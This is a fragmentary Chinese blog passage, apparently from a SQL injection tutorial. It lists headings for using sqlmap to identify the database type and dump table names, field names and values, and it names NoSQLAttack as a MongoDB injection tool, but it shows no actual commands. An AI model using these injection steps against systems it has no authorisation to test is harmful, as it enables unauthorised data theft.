　　sqlmap判断数据库种类

　　

　　

　　查看表名

　　

　　查看字段名

　　

　　查看字段值

　　

　　5. oracle

　　6. mongoDBNoSQLAttack支持mongoDB的注入工具

　　然后输入x返回，输入4进入

　　往期内容回顾

　　

　　大哥大哥行行好

　　一万字也不算少如有帮助请随意打赏